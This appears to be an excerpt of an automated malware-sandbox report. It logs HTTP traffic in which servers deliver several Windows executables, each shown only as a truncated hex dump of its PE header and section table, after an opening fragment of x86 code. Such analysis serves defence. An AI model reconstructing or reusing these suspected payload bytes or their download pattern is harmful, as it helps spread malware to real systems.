00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:59:13 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:59:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 